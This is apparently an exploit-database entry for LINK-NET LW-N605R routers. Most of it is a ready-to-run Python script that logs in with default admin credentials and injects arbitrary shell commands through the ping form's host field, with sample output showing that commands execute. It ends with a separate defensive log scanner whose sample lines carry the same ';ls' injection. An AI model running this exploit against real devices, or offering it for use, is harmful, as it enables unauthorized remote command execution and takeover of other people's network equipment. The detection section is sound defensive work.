# Title: LW-N605R 12.20.2.1486 - Remote Code Execution
# Date: 2018-09-09
# Author: Nassim Asrir
# Vendor: LINK-NET
# Product Link: http://linknet-usa.com/main/product_info.php?products_id=35&language=es
# Firmware version: 12.20.2.1486
# CVE: N/A

# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the
# HOST field of the ping feature at adm/systools.asp.
# Authentication is needed but the default password of admin for the admin
# account may be used in some cases.

# Example:
# [root@parrot]─[/home/sniperpex/Desktop]
# #python ./blue.py -t http://host/ -c ls -u admin -p admin
'''
_ _____ ______________ ______ _ _ | |\ \/ / | \ | |/ /_/ _ \| ___||_ \ | ____|____ __ | | ___ (_) |_ | | \ \ /\ / /____|\| | '_ \| | | |___ \| |_) ||_| \ \/ / '_ \| |/ _ \| | __| | |__\ VV /_____| |\| (_) | |_| |___) |_ < | |___ ><| |_) | | (_) | | |_ |_____\_/\_/|_| \_|\___/ \___/|____/|_| \_\|_____/_/\_\ .__/|_|\___/|_|\__| |_| @AsrirNassim
[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!
var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''

import urllib2
import base64
import optparse
import sys
import bs4

banner = """
_ _____ ______________ ______ _ _ | |\ \/ / | \ | |/ /_/ _ \| ___||_ \ | ____|____ __ | | ___ (_) |_ | | \ \ /\ / /____|\| | '_ \| | | |___ \| |_) ||_| \ \/ / '_ \| |/ _ \| | __| | |__\ VV /_____| |\| (_) | |_| |___) |_ < | |___ ><| |_) | | (_) | | |_ |_____\_/\_/|_| \_|\___/ \___/|____/|_| \_\|_____/_/\_\ .__/|_|\___/|_|\__| |_| @AsrirNassim
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url+"/goform/sysTools"

def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        # Unauthenticated probe: the device is expected to answer 401
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] LW-N605R Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                # The command is appended to the ping "host" field after a ';'
                response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "putmsg(mPingCount);" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'e' in content:
                        print '[!] Command "'+cmd+'": was executed!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                    print '[X] No LW-N605R page found'
                # The ping result page returns the output inside <textarea> elements
                soup = bs4.BeautifulSoup(content, 'html.parser')
                for textarea in soup.find_all('textarea'):
                    print textarea.get_text()
            except urllib2.HTTPError, e:
                if e.code == 401:
                    print '[X] Wrong username or password'
                else:
                    print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL")
commandList.add_option('-c', '--cmd', action="store", help="Insert command name")
commandList.add_option('-u', '--user', action="store", help="Insert username")
commandList.add_option('-p', '--pwd', action="store", help="Insert password")
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)
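
A defender-side check for the injection described in the header, as an added example that is not part of the original exploit: it scans access-log lines for requests to the ping form whose `host` parameter holds anything other than hostname or IP-address characters. It assumes a proxy or web server in front of the device writes combined-format logs that include the query string; the function names and log lines are constructed for illustration (Python 3).

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters a hostname, IPv4 or IPv6 literal can legitimately contain.
SAFE_HOST_RE = re.compile(r'[A-Za-z0-9.:-]{1,253}')
PING_FORM = "/goform/systools"  # compared case-insensitively

def host_values(query):
    # Split on '&' only: older urllib.parse.parse_qs also split on ';',
    # which would cut the injected part off the value and hide it.
    values = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == "host":
            values.append(unquote_plus(value))  # decodes %3B etc.
    return values

def suspicious_ping_requests(log_lines):
    """Return (line_number, host_value) for ping requests with a non-hostname host."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if PING_FORM not in target.path.lower():
            continue
        for value in host_values(target.query):
            if value and not SAFE_HOST_RE.fullmatch(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [09/Sep/2018:10:00:01 +0000] "GET /goform/sysTools?tool=0&pingCount=4&host=192.168.1.1&sumbit=OK HTTP/1.1" 200 512',
    '192.0.2.44 - admin [09/Sep/2018:10:02:13 +0000] "GET /goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;ls&sumbit=OK HTTP/1.1" 200 734',
    '192.0.2.44 - admin [09/Sep/2018:10:02:20 +0000] "GET /goform/sysTools?tool=0&pingCount=4&host=127.0.0.1%3Bls&sumbit=OK HTTP/1.1" 200 734',
    '192.0.2.10 - admin [09/Sep/2018:10:05:00 +0000] "GET /adm/systools.asp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in suspicious_ping_requests(SAMPLE_LOG):
        print("line %d: suspicious host value %r" % (number, value))
```

The same allowlist pattern is what the ping handler itself would need to apply to `host` before building a shell command; a form submitted by POST carries the parameter in the body, which access logs do not record.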